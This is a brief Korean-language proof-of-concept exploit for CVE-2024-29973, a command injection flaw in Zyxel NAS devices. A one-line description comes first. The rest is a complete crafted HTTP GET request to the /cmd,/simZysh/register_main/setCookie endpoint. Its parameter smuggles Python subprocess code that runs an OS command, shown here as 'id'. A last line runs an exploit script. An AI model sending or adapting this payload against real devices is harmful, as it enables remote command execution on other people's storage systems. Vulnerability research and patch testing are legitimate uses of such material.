
CVE-2024-29973, Zyxel NAS 장치의 명령 주입 취약점에 대한 개념 증명(PoC) 익스플로잇입니다. /cmd,/simZysh/register_main/setCookie 엔드포인트로 조작된 HTTP GET 요청을 전송하여 임의의 OS 명령을 실행합니다.

GET /cmd,/simZysh/register_main/setCookie?c0=storage_ext_cgi+CGIGetExtStoInfo+None)+and+False+or+__import__("subprocess").check_output("id",+shell=True)%23 HTTP/1.1
Host: xxxx
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: language=en
Python3 CVE-2024-29973.py